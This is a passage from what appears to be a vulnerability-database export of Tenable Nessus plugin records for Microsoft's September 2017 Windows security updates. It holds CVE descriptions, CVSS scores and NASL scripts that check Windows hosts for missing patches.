(CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038779/windows-7-update-kb4038779\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf7e8b94\");\n # https://support.microsoft.com/en-us/help/4038777/windows-7-update-kb4038777\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1dbb18cc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038779 or Cumulative update KB4038777\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8682\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-09';\nkbs = make_list('4038779', '4038777');\n\nif (get_kb_item(\"Host/patch_management_checks\"))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(\n os:'6.1',\n sp:1,\n rollup_date:'09_2017',\n bulletin:bulletin,\n rollup_kb_list:[4038779, 4038777]\n )\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:34:12", "description": "The remote Windows host is missing security update 4038793 or cumulative update 4038792. It is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. 
An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8683)\n\n - An information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681, CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server. An attacker who successfully exploited the vulnerability could either run arbitrary code on the DHCP failover server or cause the DHCP service to become nonresponsive. To exploit the vulnerability, an attacker could send a specially crafted packet to a DHCP server. However, the DHCP server must be set to failover mode for the attack to succeed. The security update addresses the vulnerability by correcting how DHCP failover servers handle network packets. (CVE-2017-8686)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. 
An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8707, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM Host Agent Service of Remote Desktop Virtual Host role when it fails to properly validate input from an authenticated user on a guest operating system. 
To exploit the vulnerability, an attacker could issue a specially crafted certificate on the guest operating system that could cause the VM host agent service on the host operating system to execute arbitrary code. The Remote Desktop Virtual Host role is not enabled by default. An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system. The security update addresses the vulnerability by correcting how VM host agent service validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. To exploit the vulnerability, the user must either browse to a malicious website or be redirected to it. In an email attack scenario, an attacker could send an email message in an attempt to convince the user to click a link to the malicious website. 
(CVE-2017-8733)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 September 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8680", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8684", "CVE-2017-8686", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8713", "CVE-2017-8714", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8728", "CVE-2017-8733", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", 
"CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038792.NASL", "href": "https://www.tenable.com/plugins/nessus/103131", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103131);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8759\"\n );\n script_xref(name:\"MSKB\", value:\"4038792\");\n script_xref(name:\"MSFT\", value:\"MS17-4038792\");\n script_xref(name:\"MSKB\", value:\"4038793\");\n script_xref(name:\"MSFT\", value:\"MS17-4038793\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038793\nor cumulative update 4038792. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. 
(CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. 
(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. 
An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8707, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. 
An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038792/windows-8-1-update-kb4038792\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?085e4d22\");\n # https://support.microsoft.com/en-us/help/4038793/windows-8-1-update-kb4038793\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf3ecec7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038793 or Cumulative update KB4038792.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038792', '4038793');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038792, 4038793])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:38:26", "description": "The remote Windows host is missing security update 4038781.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. 
The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8683)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8734)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. 
By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8738, CVE-2017-8753, CVE-2017-8756)\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A remote code execution vulnerability exists in the way Microsoft Edge handles objects in memory. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles clipboard events. For an attack to be successful, an attacker must persuade a user to visit a malicious website and leave it open during clipboard activities. The update addresses the vulnerability by changing how Microsoft Edge handles clipboard events in the browser. (CVE-2017-8643)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. 
